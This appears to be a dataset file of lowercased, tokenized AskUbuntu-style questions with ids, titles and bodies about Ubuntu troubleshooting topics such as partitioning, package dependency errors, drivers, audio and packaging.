320927	gparted ca n't resize logical partitions	i have 6 partitions in total . in order , they are sda1 : windows boot loader . sda2 : windows 7 partition . sda3 : storage partition ( ntfs ) . sda4 : extended partition containing sda5 , ubuntu , and sda6 , it 's swap . take a look here : i am trying to extend sda4 to grab that last bit of unallocated space . then , i move the swap to the end of the extended partition and use the free space in the middle of the swap and ubuntu to extend ubuntu . the processes in gparted looks like this : grow /dev/sda4 from 46.00 gib to 66.70 gib move /dev/sda6 to the right and shrink it from 16.00 gib to 8.00 gib grow /dev/sda5 from 30.00 gib to 58.70 gib however , when i try to perform these operations , it gives me this error : unable to satisfy all constraints on the partition there is little error icon next to sda5 : e2label : no such file or directory while trying to open /dev/sda5 could n't find valid filesystem superblock could n't find valid filesystem superblock dumpe2fs 1.42 ( 29-nov-2011 ) directory while trying to open /dev/sda5 unable to read the contents of this file system ! because of this some operations may be unavailable . the cause might be a missing software package . the following list of software packages is required for ext4 file system support : e2fsprogs v1.41+ . however , apt-get says that e2fsprogs is already installed . i am very confused .
320934	ubuntu sdk on open suse	from where can i download ubuntu sdk for mobile application development ? i can not find any links to operate it on opensuse .
320936	sshplus config file	i just recently lost my old hdd and put a new one in my machine and have been getting back to where i was before this whole mess and now i ca n't seem to find clear instructions on how to make a config file for sshplus , or where to find an example config file that i can just edit . does anyone happen to know where i could find one ?
320937	ubuntu 13.04 - can not install programs	i get the following error : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/t/tomcat7/libservlet3.0-java_7.0.35-1~exp2ubuntu1.1_all.deb . i can not install any programs , what is the remedy ?
320939	ubuntu software center wont open 13.04	hi . i am brand new to this operating system but not afraid to get my hand a bit dirty to find the solution . i downloaded ubuntu 13.04 amd 64 bit today and installed via a flash drive . everything works from what i have played with tonight except the software center . i click to open it and the icon flashes about 4 times and nothing . so in terminal i typed software-center and got 2013-07-17 00:06:05,332 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 429 , in __init__ self.useful_cache = usefulnesscache ( true ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 91 , in __init__ self._retrieve_votes_from_server ( ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 105 , in _retrieve_votes_from_server user = get_person_from_config ( ) file `` /usr/share/software-center/softwarecenter/utils.py '' , line 638 , in get_person_from_config cfg = get_config ( ) file `` /usr/share/software-center/softwarecenter/config.py '' , line 180 , in get_config _software_center_config = softwarecenterconfig ( filename ) file `` /usr/share/software-center/softwarecenter/config.py '' , line 38 , in __init__ super ( softwarecenterconfig , self ) .__init__ ( ) typeerror : must be type , not classobj so then i tried sudo apt-get install -- reinstall software-center and get the same code so any advise would be great thanks
320942	getting log file of system on & off history	how i can get the log-file of ubuntu 12 shutdown , restart and start history , i tried with `` last usernanme '' in terminal but not getting the data i want , please help me to find the log file .thanks in advance
320945	how to exclude a repository while installing updates using apt-get	i generally do : sudo apt-get update sudo apt-get upgrade but i do not wish to update google chrome i.e . i do n't want to install updates from http : //dl.google.com/linux/chrome/deb/ repository . how can i achieve this ?
320946	jackd does not work , aplay -l shows two instances of the same card ( ubuntu 13.04 , hdmi audio only )	i 'm on ubuntu 13.04 , using a zareason zini , which as far as i can tell has no audio output other than its hdmi port . i 'm trying to get the clojure library overtone working , and ran into the problem described here . the underlying problem seems to be that jackd does n't work : anand @ anand-desktop : ~ $ jackd -r -d alsa jackdmp 1.9.10 copyright 2001-2005 paul davis and others . copyright 2004-2013 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details no message buffer overruns no message buffer overruns no message buffer overruns jack server starting in realtime mode with priority 10 audio_reservation_init acquire audio card audio0 creating alsa driver ... hw:0|hw:0|1024|2|48000|0|0|nomon|swmeter|-|32bit alsa : can not open pcm device alsa_pcm for playback . falling back to capture-only mode can not initialize driver jackserver : :open failed with -1 failed to open server following the blog post and advice others have given for similar problems , i did aplay -l and saw anand @ anand-desktop : ~ $ aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 there seem to be two instances of the same card . doing jackd -r -d alsa -d hw:0 produces the original error , and any other device number results in alsa lib pcm_hw.c:1401 : ( _snd_pcm_hw_open ) invalid value for card unfortunately , that means that the standard fix described in the blog post does n't work for me . how can i get jackd working ?
320951	how to upgrade ubuntu 10.04 lts to ubuntu 13.04 without internet ?	no internet , no cd/dvd rom , only usb . i have no idea how to upgrade the system . any one can tell ?
320957	google chrome wo n't maximize when i drag it to the top edge	when i first start google chrome , i can not maximize the window by dragging it to the top edge of my screen . the orange box showing me that the window should be maximized will come up , but when i release the window the box just stays and the window remains unmaximized . if i maximize by pressing the button , unmaximize it by resizing the window , then drag it to the top edge , it will work . as far as i can tell , this problem only happens with google chrome . google chrome 28.0.1500.71 ( official build 209842 )
320959	create local svn repo / url ?	i need an svn repo , just local on my pc . what i did was mkdir ~/svn/myproject svnadmin create -- fs-type fsfs ~/svn/myproject svnserve -d under ~/svn/myproject , there 's a conf folder , so i take it that creating the repo was successful . i would expect the repo to be accessible under svn : //127.0.0.1/svn/myproject but it is n't . are there other steps that i need to take ?
320964	remotely connecting to a raring ringtail desktop from windows 8	i have an ubuntu ( 13.04 ) computer on my home network and frequently want to access it remotely from my windows 8 pc ( like an rdp session on 2 windows pcs ) . i have found a few solutions , but many are for older versions of ubuntu and/or windows . i was looking in to using a vnc client on my windows machine , but did not find any with good reviews that seemed up-to-date . if anyone can suggest a windows vnc client , an ubuntu rdp server , or another method of connecting to my ubuntu machine , i would really appreciate it . thanks !
320967	apache php not working after update	im using ubuntu 12.04 lts . there was an ubuntu-update yesterday and after starting the pc today my apache php isnt working anymore . i get the download of the php-files instead of the website . i tried to enable php again with sudo a2enmod php5 but its not working . i also tried to reinstall it.. but im getting this error : sudo apt-get purge libapache2-mod-php5 sudo apt-get install libapache2-mod-php5 paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig einige pakete konnten nicht installiert werden . das kann bedeuten , dass sie eine unmögliche situation angefordert haben oder , wenn sie die unstable-distribution verwenden , dass einige erforderliche pakete noch nicht erstellt wurden oder incoming noch nicht verlassen haben . die folgenden informationen helfen ihnen vielleicht , die situation zu lösen : die folgenden pakete haben unerfüllte abhängigkeiten : libapache2-mod-php5 : hängt ab von : libxml2 ( > = 2.8.0 ) aber 2.7.8.dfsg-5.1ubuntu4.5 soll installiert werden empfiehlt : php5-cli soll aber nicht installiert werden e : probleme können nicht korrigiert werden , sie haben zurückgehaltene defekte pakete .
320969	ssd 4k alignment question	i have the following partitions for my ssd : ( sector size = 512byte ) number start end size type file system flags 1 2048s 122882047s 122880000s primary ntfs boot 2 191475710s 250068991s 58593282s extended 5 191475712s 250068991s 58593280s logical ext4 while my ubuntu is installed on partition 5 , which is 4k-aligned , the extended partition is not ( 191475710/8 is n't whole number ) . would there be a problem with this kind of set-up ?
320970	not able to install packages in ubuntu 11.04	i installed ubuntu 11.04 ( my pc is very old and have low configuration 11.04 working well ) , but when i trying to install restricted extra codec , adobe flash getting error message `` counld read from source '' i software center . aslo when i am trying to install from command line it saying broken dependencies the following packages have unmet dependencies : when i executed the command apt-get -f install ' i showing no packages to install 0 installed 0 upgraded . how to resolve the this issue
320973	how to check jar application 's return number ?	i have written an application in java . then , i packed it into a jar file and now i run it from command line using `` java -jar myapp.jar '' . because it connects to the web , sometimes it throws the ioexception . so what i 'd like to do is to check jar file 's return value on application finish ( when application closes gracefully it returns 0 and when it closes because of an exception it returns 1 ) . next , i 'd like to run this jar file as long as it wo n't return the 0 value ( some kind of while loop ) . thanks for help .
320996	make default `python` command to use python 3	i can access python 3 via python3 command . but i want to make the default interpreter to use python command for python 3 . simple typing python takes me to python 2 . how to upgrade ?
320999	make directory command not working	i am new to the ubuntu . i have logged in as guest then switch to namu user and want to make directory but get error as follows : gest @ ubuntu : ~ $ su namu password : namu @ ubuntu : /home/gest $ cd .. namu @ ubuntu : /home $ cd .. namu @ ubuntu : / $ mkdir file mkdir : can not create directory âfileâ : permission denied namu @ ubuntu : / $
321006	the system is running in low-graphics mode error in âvirtualboxâ	hi guys this error just popped up in my virtualbox . after the error screen shows up , i press command+f1 ( i use a macbook ) and a command line comes to the screen that wants me to login . after logging in , i tried sudo apt-get autoremove sudo apt-get autoclear then press command+f8 but same error still remains .
321008	how can i fix silverlight problem ?	i want to explain my problem with images and links , but i do n't have reputations so i posted same question in the following link . how to install moonlight on ubuntu can check it and suggest me . thanks i am using ubuntu 12.04.i tried to open this link.i got the page in the following way . i searched some forums , one guy suggested ubuntu not supported to silverlight so you need to install moonlight . so i downloaded moonlight from this site.i installed in the following way open firefox and drag and drop the file into firefox.it shows successfully installed . i reopen firefox and reopen these same microsoft site.it showing blank page ( white page ) .like this how can i fix this , can anyone suggest me thanks .
321010	how to change permissions on a usb stick ?	i have two usb sticks , both are recognized automatically but when i try to write or copy files to either it comes up with error saying i do not have permission to copy to this destination folder.i have changed the permissions in properties but it will not let me to change the permissions for the actual usb stick . what can i do ?
321011	lenovo g580 wireless/bluetooth function key problem	i 'm using lenovo g580 . when i turn wifi/bluetooth on with fn+f5 , it 's actually not turning on . to turn it on , i need to restart . how can i solve this problem ?
321018	setting up conky on ubuntu	i am surprised after seeing the features in the picture shown . after searching a little bit , i came to know that it is a conky theme . but now i also am not clear about it , and i do n't know how to install it . help me out !
321019	php.ini cli symbolic link	why do we have a different php.ini for the php client ? is it a good idea to link the main instead ? $ sudo ln -s /etc/php5/apache2/php.ini /etc/php5/cli/php.ini
321021	save open applications as a set and then quick open the set	i want the following set of applications to be opened at the same time : evince /home/abc/docs/personal/a/b/c/xyz.pdf evince /home/abc/docs/work/x/y/z/123.txt nautilus /home/abc/docs/ i want to construct this set using a gui via dragging & dropping or selecting already-opened windows . then the set should be saved and can be opened by one click or by running only one script . there is possibility to write a script for each set of applications , however there must be an automated way since i need tens of sets of applications , and these sets are used a few times . are there any such tools except session saving capabilities of ubuntu ?
321023	how to open a .bat file ?	the .bat file has this context `` start client.exe ur ; name=test ; ip=79.114.123.26 ; port=8888 '' can anyone tell me the instuctions how to run it , thanks in advance
321025	why do `` svn '' commands block in gnome-terminal for couple of minutes ( but guake terminal works instantly ) ?	i am facing a strange problem where svn commands block for a couple of minutes if i use gnome-terminal . so does uxterm and terminator . but strangely guake terminal works fine . i ran the following command both in gnome-terminal and guake terminal : strace -r -o strace.outfile svn ls svn : //192.168.1.10 i have pasted the output for gnome-terminal here : http : //pastebin.com/57sp8vxk . as you can see in case of gnome-terminal the poll waits for 25 seconds at line-no 40 . i 've shown only the first wait . it happens multiple times for a total of 145 seconds . it does not wait like that in the guake terminal . any idea ? what they are waiting for and why it happens only in gnome-terminal ? my system information : > cat /etc/issue ubuntu 12.04.2 lts \n \l > uname -a linux sabya-ubuntu 3.2.0-49-generic # 75-ubuntu smp tue jun 18 17:39:32 utc 2013 x86_64 x86_64 x86_64 gnu/linux
321032	i would like to access my localhost files with an ftp programme	i have installed an apache2 server and installed php and everything else i need to run a website from my laptop , however , when i try to access it with crossftp with the following settings i get the following results : i do not have a firewall set up and i get the same response with ip address 127.0.0.1 can anyone explain what 's happening , and what i should try next ?
321035	broadcom sta wireless driver not activating	i just installed ubuntu 12.04 lts and the sta broadcom drivers give me an error saying `` sorry , installation of this driver failed '' when i try to activate in additional drivers i know that the sta driver is what i need i checked in the terminal that i have bcm4312 but i dont have internet access to the computer im trying to do this on because the ethernet port doesnt work so i need help in finding a way to install the sta drivers so i can start using wireless
321037	installing software error : no installation candidate	i want to install the software doxygen and graphvi for my research . i used the command sudo apt-get install doxygen graphviz then it is returning these errors : reading package lists ... done building dependency tree reading state information ... done package graphviz is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : unable to locate package doxygen e : package 'graphviz ' has no installation candidate how can i fix this ? thanks in advance
321040	free typing in nautilus : how to make it select elements instead of running a search ?	when using nautilus , sometimes i want to jump do a directory ( or a file ) that i know is in there , but i do n't want to visually look for it . the easy way to do that in windows ( and , for what i can remember , in previous versions of ubuntu ) is to simply type the element 's name and the window manager will browse the displayed element in order to find it . right after that , you just have to hit enter to open it . for instance , if i 'm in my home folder and want to access the dev folder , i just type de , enter and i 'm in it . instead of that , in ubuntu 13.04 , when you free type while you 're in nautilus , it will run a search ( i do n't know in which scope : the whole folder you 're in , i suppose ) . is it possible to disable this mechanism and restore the previous one ?
321042	package 'libhtml-parser-perl ' : is a directory e : sub-process /usr/bin/dpkg returned an error code ( 2 )	i encountered the problem few weeks ago . first i did n't pay to much attention and i let the server running , but for now , there is a lot of upgrades to be fixed and i 'm stuck . if i try to upgrade something the process will ended with the message below . even the autoremove . ( reading database ... dpkg : unrecoverable fatal error , aborting : reading files list for package 'libhtml-parser-perl ' : is a directory e : sub-process /usr/bin/dpkg returned an error code ( 2 ) thanks ubuntu 12.04.2 lts ( gnu/linux 3.2.0-48-generic x86_64 )
321045	blank display screen after upgrade to 13.04	i just upgraded my ubuntu to 13.04 and after logging in my kde plasma workspace i can not change any monitor display . it involves having the screen resolution at about 800x640 ( i usually use 1600x1200 ) and not being able to add a 2nd monitor as usual . is there anything i can do to solve it ? i clearly can not work and can not upgrade anything else : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : akonadi-facebook 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . system information : $ cat /etc/*ease distrib_id=ubuntu distrib_release=13.04 distrib_codename=raring distrib_description= '' ubuntu 13.04 '' name= '' ubuntu '' version= '' 13.04 , raring ringtail '' ...
321048	connecting through a proxy , ssh could not resolve hostname	i need to connect with a server of my company . i 'm behind a proxy , and my browser have the proxy configured . from my browser , i can reach this server . but with ssh i can not contact with this server , even providing the ip . does ssh need a different proxy or is another problem ?
321049	ubuntu version for sis mirage 3 based laptop	what is the best ubuntu version for sis mirage 3 vga based laptop . just to get 1280x800 resolution not 3d graphic . any suggestion ?
321052	how to install a driver in ubuntu ?	i 'm trying to install a wifi driver on a dell e6400 laptop . i found a forum article that pointed to the right drivers , but ca n't get them onto the system . i 'm new to ubuntu , with only minimal experience of linux and unix . the `` jockey '' /additional drivers method given in article how do i install drivers for graphics and sound ? does n't seem to have a visible option to install anything , so it seems a bit pointless . i also get an error `` downloading package indexes failed , please check your network status '' before additional drivers displays . catch 22 ! i also looked at software center , after reading another posting . this also has no way to manually install a driver ( or anything . . . ) , it 's just a big empty shop window . i suspect i 'm missing something important here !
321063	./configure bash : no such file or directory	i have been trying to configure the above python module but getting the thread as `` no such file or directory '' $ cd desktop $ tar -zxvf dm.xmlsec.binding.1.0b3.tar.gz $ cd dm.xmlsec.binding.1.0b3 $ ./configure bash : no such file or directory please help me out !
321065	switching from windows 7 to ubuntu and need help	first i want to say welcome to the community and i humbly ask for your expertise . 1.i want to fully overwrite windows with ubuntu . is it as simple as just downloading over it ? 2.should i use 32bit or 64bit ? 3.what makes 64bit better ? 4.can my relatively old computer even run 64bit ? cpu-intel pentium d dual core 3.40ghz gpu-radeon hd 6570 ram-6gb ddr2 motherboard-hp oa58h
321068	error in running ip messanger:	i am getting the error message after installation of ip msgnger on ubuntu-13.04 : filename : ipmsg.c function : create_lock_file line:157 can not setup lock file : /tmp/g2ipmsg.lock errno : -11 ( resource temporarily unavailable )
321069	server on utilite pc	just found utilite pc ( http : //utilite-computer.com/web/home ) saying they will run ubuntu . i was wondering if this fanless pc will be strong enough to run a ubuntu server distribution on it ? of course a small server - thinking of a small office server , running mail , calendar , a small internal webserver , etc . what do you think ? cheers gerhard
321079	ubuntu is gone after reinstalling windows 7	my windows 7 got infected with a seriouly bad virus , just because i disabled my anti-virus , so after i re-enabled it i tryed to fight of viruses by doing a start-up scan , but my anti-virus froze and got disabled by the viruse , and all system files also got infected . so i re-installed windows 7 and now i do n't see the ubuntu boot loader and i do n't know what to do . i do n't want to have to re-install ubuntu too . i 'm new to linux , i do n't even know what grub is .
321083	how to install amd catalyst 13.1 legacy on ubuntu 13.04 ?	i have upgraded my ubuntu 12.04 to 13.04. everything is well but i can not install amd catalyst legacy 13.1 . i think the new 13.1 driver is not compatilble with ubuntu 13.04 , so i have to downgrade to ubuntu 12.04 again . can you help please ?
321086	problem viewing youtube videos	so i 've checked all the threads on the problems regarding viewing youtube videos . for me , one videos work perfectly , the other one does n't load from the beginning . it must be a flash plugin problem as the same thing goes on in chromium and firefox at the same time . switching youtube to html5 wo n't fix the problem neither changing the flash player 's settings . i do n't wan na nag about adobe flash and stuff , all i want is my youtube back fgs ! so is there anybody who has actually solved this problem ?
321089	how can i set a default profile for a network interface in network manager ?	i have the following network profiles defined in network manager in my xubuntu vm : '' dhcp '' and `` static '' are bound to eth1 , and `` vm network '' is bound to eth0 . i 'd like `` dhcp '' to be the default for eth1 , but networkmanager always seems to choose the static profile on startup . how do i set the default ?
321091	where should i place templates and config file in debian hierarchy	i am writing a debian binary package for my application ( foo ) . the postinst ( post install ) script wants to ask the user few questions and get the answers as well . i am trying to achieve this using debconf . but i am not able to see the ui screen , prompting user with questions . i doubt if my config and templates are even called by dpkg . i am using all the instructions as per the link debconf tutorial could someone please clarify me on the below questions : i am placing the “config” script and “templates “ file inside /debian/tmp/debian/ . so is it the correct location in debian hierarchy ? are the names correct ? are my below scripts correct ? snippet of control file ( only relevant fields i am posting ) depends : debconf ( > = 0.2.17 ) snippet of config file # ! /bin/sh set -e # echo `` config being called '' # source debconf library . . /usr/share/debconf/confmodule # do you like debian ? db_input medium foo/like_debian || true db_go # check their answer . db_get foo/like_debian if [ `` $ ret '' = `` false '' ] ; then # poor misguided one.. db_input high foo/why_debian_is_great || true db_go fi snippet of templates file template : foo/like_debian type : boolean description : do you like debian ? we 'd like to know if you like the debian gnu/linux system . template : foo/why_debian_is_great type : note description : poor misguided one . why are you installing this package ? debian is great . as you continue using debian , we hope you will discover the error in your ways . snippet of preinst : # ! /bin/sh set -e # echo `` stage preinst '' $ 1 exit 0 snippet of postinst : # ! /bin/sh set -e # echo `` stage postinst '' $ 1 # source debconf library . . /usr/share/debconf/confmodule db_get foo/like_debian if [ `` $ ret '' = `` false '' ] ; then touch `` /home/myhome/itworked '' fi exit 0 snippet of prerm : # ! /bin/sh set -e # echo `` stage prerm '' $ 1 exit 0 snippet of postrm : # ! /bin/sh set -e # echo `` postrm '' $ 1 exit 0 thanks , -sandeep
321102	how to add `` open jdk7 '' to deffault open program list ?	i want to open a .jar file , but `` open jdk 7 '' is not in other applications list . how can i add `` open jdk 7 '' to `` other applications '' list and then set it as default opener ? i have no such problem in ubuntu 12.04 but in 13.04 i can not set `` open jdk 7 '' as default . i have to right click on .jar file and select open with `` open jdk7 '' every time that is annoying .
321104	locate name does n't work	there is a file at /user/share/jogl.jar . i am using locate jogl.jar but it does n't work . why ?
321106	google query from terminal	i was wondering if there is a way to launch a google query from the terminal ? preferably without any extra program . like starting up google ( as in `` firefox google '' ) but including the search query ? it would be more comfortable being able to write everything in a single command . i apologize if this has been covered already , i looked around but i could n't find any solution that fit . thanks in advance from a linux beginner !
321110	is it possible to install ubuntu directly from and to the hdd ?	i live a long way from stores . i 'm in rural eastern cape south africa . i downloaded ubuntu but i do n't have any blank dvd 's . can i copy it to my hdd and install from there ?
321115	how to remove password recovery reset ?	how can i remove the ability to reset passwords outside of ubuntu . this probably is ill advised , but i already have set a really good password that i can not forget with high entropy and 42 characters . i think that it is great that ubuntu can so easily reset a password , but it seems like a big security risk . ( i know you can edit grub , but anyone that knows anything about linux will just edit the boot command and boot into recovery anyway . ) thanks in advance .
321125	kernel panic error in ubuntu 12.10	before installing xen hypervisor my ubuntu 12.10 was working fine , but after installing xen i am unable to boot my ubuntu . the error is : /bin/sh : error while loading shared liberaries : libc.so.6 can not open shared obj etc file : no such file or directory [ 1.279236 ] kernel panic -not syncing : attempted to kill init ! exitcode =0*00007f00
321126	windows installer not completing installation	i am using 64 bit windows 7 with ntfs file system , while try to install ubuntu through windows installer its starting to download file but stops at about 45 % . please guide me through tshoot
321127	how to reinstall ubuntu linux 12.04 , after i reinstalled windows 7	i had ubuntu and windows both on my pc . i reinstalled windows 7 and ubuntu just disappeared after that . when i tried to reinstall ubuntu , it is showing errors . and i am new to ubuntu , i do n't know anything about it .
321134	gnome shell 3.6.3.1 problem with windows becoming unresponsive	i have gnome shell 3.6.3.1 with compiz enabled . everything works great for the most part , but i do have an issue whether i have compiz enabled or not . i am using fallback classic and whenever a window is maximized , and i want to unmaximize , minimize , or close a window , that window becomes unresponsive . btw ( ubuntu 13.04 ) the two workarounds that i have found is using the application switcher which then i can use alt+f4 to close the window or using cairo-dock ( no open-gl ) after i use the app switcher to unmaximize . i tried upgrading to a newer gnome before but that was much worse . i would like to stay with this gnome as it is fairly stable on my machine . any ideas ? thanks in advance .
321136	package dependency issue : linux-server	i am using 64-bit ubuntu 12.04 and logged in as root . when i try to run : apt-get upgrade i get this error : the following packages have unmet dependencies : linux-image-server : depends : linux-image-3.2.0-48-generic but it is not installed linux-server : depends : linux-image-server ( = 3.2.0.49.59 ) but 3.2.0.48.58 is installed if i try to run : apt-get -f install i get a similar error . i have tried manually downloading and installing the package but i get the same error : wget https : //launchpad.net/ubuntu/+archive/primary/+files/linux-server_3.2.0.49.59_amd64.deb dpkg -i linux-server_3.2.0.49.59_*.deb dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.49.59 ) ; however : version of linux-image-server on system is 3.2.0.48.58 . i also get a similar error if i try to remove the linux-server package : apt-get remove linux-server the following packages have unmet dependencies : linux-image-server : depends : linux-image-3.2.0-48-generic but it is not going to be installed it seems every solution to other posts where people have run into the same problem that i have tried give me a similar error . update : i found a solution . i had to remove linux-server , linux-image-server , and linux-headers-server at the same time in one command .
321140	list of gconf keys , in particular nm-applet	i made the same mistake ( clicking `` do not show again '' in nm applet ) as this guy : where can i find network manager 's gconf key ? the problem is that the entirety of my nm-applet/gconf.xml is : < ? xml version= '' 1.0 '' ? > < gconf > < entry name= '' stamp '' mtime= '' 1361807727 '' type= '' int '' value= '' 3 '' / > < /gconf > so the only listed key is `` stamp '' . i will manually add a new key `` suppress-whatever : false '' in gconf-editor , but i do n't know the name of the key to add . gconftool-2 -- recursive-list /apps/nm-applet only shows existing keys , i.e . : stamp = 3
321144	how to install python and wxpython offline ?	i could not install my modem driver so i have to update and install applications offline . for this i want to use keryx but to install keryx , python and wxpython have to be installed first . so how do i install python and wxpython offiline on ubuntu 13.04 ? note : i do n't have internet connection in ubuntu . so i 'll have to download the required file from my windows 7 .
321145	why are the vlc shortcuts ( stop/previous/next ) greyed out in the tray ?	when i run vlc , an icon appears in the tray . when i click this icon , it pops a dropdown list containing shortcuts ( hide vlc , play , stop , previous , next , speed , ... ) . but the stop , previous and next are greyed out . note that i 'm right in the middle of a playlist and that the other shortcuts ( buttons on the vlc player ) works fine . any idea why ?
321146	minify tool that can be executed through terminal	i am looking for a tool or a way to minify ( similar to compress my code and this question on stack ) all of the code in my .xml , .css , .html and .js files through ubuntu 's terminal . eventually i will bash script the process , but at the moment i would like to just find something to test . is there a tool out there that i can use to compress all these file formats through the terminal ?
321150	how to use the default calendar indicator more effectively in 13.04	how to sync all my calendar events to the calendar indicator in ubuntu 13.04 ? i have got a calendar indicator on my panel next to volume but it never shows any of my events . i have got thunderbird installed and have synced my google calendar with it . is that the default calendar in 13.04 ?
321154	what is sudo tar -xzf ? why it is used ?	i need to know the extensions of xzf and its usage.is it necessarily to be used in installing a software ? sudo tar -xzf utorrent-server-3.0-ubuntu-10.10-27079.tar.gz why this is used ?
321155	uninstall ubuntu reinstall windows	my son installed ubuntu on my laptop for me to use i like it except my insulin pump only uses windows . i know nothing about the structuring of the hd . i have the windows 2000 full installation disk and the windows vista upgrade disk . i do not have a recovery disk cause my son did n't make one before uninstalling windows and putting ubuntu on . i believe it was due to windows crashing that he went to ubuntu . i am using ubuntu 12.04 .
321160	how to get ubuntu to stop heating up so much	i already have another post on how to control the fans , but i was wondering if i am doing anything to cause this . ubuntu is running great at the beginning but after about twenty minutes of running temp goes from about 110 degrees f to 190 degrees f. even if i quit all programs the temp stays at the higher temp . i have checked process list and nothing seems out of the ordinary . the main programs that i run before this happens are clementine , firefox nightly , cairo-dock ( no opengl ) , and gnome-system-monitor . the only thing that i have found to help is to reboot . then i start the process all over again . by the way , i have a laptop cooler that it is also on . i 'm pretty sure it would overheat on me if i did n't have that . i have had it get hot so far but i think the max temp is 225 degrees f. i 'm not too worried but it would be nice to have an answer . ubuntu ( 13.04 ) gnome shell 3.6.3.1 fujitsu lifebook ah530
321161	why does my linux version name read linaro instead of xubuntu and how can i fix it ?	i have xubuntu 12.04 installed . when i run any updates or installs , i do receive strange warnings touching `` linaro '' and software-center is not able to run with following error : : ~ $ software-center error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 194 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 169 , in _get_distro module = __import__ ( distro_id , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linaro warning : gnome-keyring : : could n't connect to : /tmp/keyring-9mi6cw/pkcs11 : adresář nebo soubor neexistuje traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 140 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 50 , in < module > from softwarecenter.db.application import application file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 194 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 169 , in _get_distro module = __import__ ( distro_id , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linaro and on the boot , there are `` linaro '' not `` xubuntu '' distribution . i guess , that this change come when i changed stable kernel to current kernel , when my kernel was in conflict with extended nvidia driver . everything else works well.. so it is not a big issue , just weird . i thought that linaro distribution is targeted to arm processors . how this distribution name come to me i do not know . what i can do to get back to xubuntu distribution name ? added : $ lsb_release -a no lsb modules are available . distributor id : linaro description : linaro 12.11 release : 12.11 codename : precise $ python -c 'import platform ; print platform.linux_distribution ( ) ' ( 'linaro ' , '12.11 ' , 'precise ' ) i 'm pretty sure , that i have 12.04 xubuntu installed ... $ more /etc/lsb-release distrib_id=linaro distrib_release=12.11 distrib_codename=precise distrib_description= '' linaro 12.11 '' $ dpkg-query -w base-files base-files 6.5ubuntur6linaro12.11 $ apt-cache policy base-files base-files : instalovaná verze : 6.5ubuntur6linaro12.11 kandidát : 6.5ubuntur6linaro12.11 tabulka verzí : *** 6.5ubuntur6linaro12.11 0 500 http : //ppa.launchpad.net/linaro-maintainers/overlay/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status 6.5ubuntu6.5 0 500 http : //cz.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 6.5ubuntu6 0 500 http : //cz.archive.ubuntu.com/ubuntu/ precise/main amd64 packages you are right , looks like i have their linakro kernel , what did solve my kernel-nvidia problem , but something more was added ... but i have no other troubles , than misfunctional software center , so it is not seriously messed up .
321164	wine + lotro + bumblebee	so here is my strange problem . ( if this goes outside of the realm of ubuntu let me know ) i recently purchased a new samsung series 7 chronos which uses the nvidia optimus technology . i have installed bumblebee and also added the bumblebee indicator . being a lord of the rings online player , i installed wine ( 1.5 ) , and pylotro ( windows version since linux native no longer works with latest update ) . the odd thing is that , when i use bumblebee indicator , or optirun to start lotro using pylotro , the output box only says '*finished* ' without any other details and it wo n't run . however , if i run pylotro outside of bumblebee , it gives me lots of output and just starts the game . anyone have any ideas how i can get this to work through my nvidia card ? thanks
321167	why does n't the bootable usb show up in the bios ?	i followed all the instructions on the ubuntu website as to how to install ubuntu using a bootable usb . i got the linux pendrive thing , formatted the usb , and have nothing on it besides what was put there by the pendrive program . i 'm on a toshiba satellite , windows 7 . when i restart the pc , i hit f2 for the bios and it 's just not there . i booted it up with anything i possibly could but none of them were the usb stick , so none of them showed the ubuntu installation screen . after going back and scavenging to find something i may have done wrong , then re-doing it , it 's still not working . the drive itself is some form of 8gb lexar , if that helps anything .
321170	how do you install odesk team for ubuntu 12.04 lts ?	i am need of assistance on how to install odesk team ( www.odesk.com/downloads ) for ubuntu 12.04 lts . i have tried downloading the 12.04 versions for ubuntu but all i see in the status is error : architecture error . please help .
321172	what programs should i use optirun or primusrun for ?	is there an easy way to find out if i should run a program with primusrun ? for example - wolfram mathematica - it can do without it but what if it runs smoother with it ? would it be bad to always use primusrun , as bumblebee 's purpose , if i 'm understanding it correctly , is to actively select when to use the gpu ? should n't it not matter , then , in terms of energy consumption , if every program i run , graphics-intensive or not , uses primusrun ? in other words , is there a programtical way of seeing whether a program uses opengl ? can this be utilized to make the command if [ uses opengl x ] ; primusrun x ; else x ; run every time i run an application ?
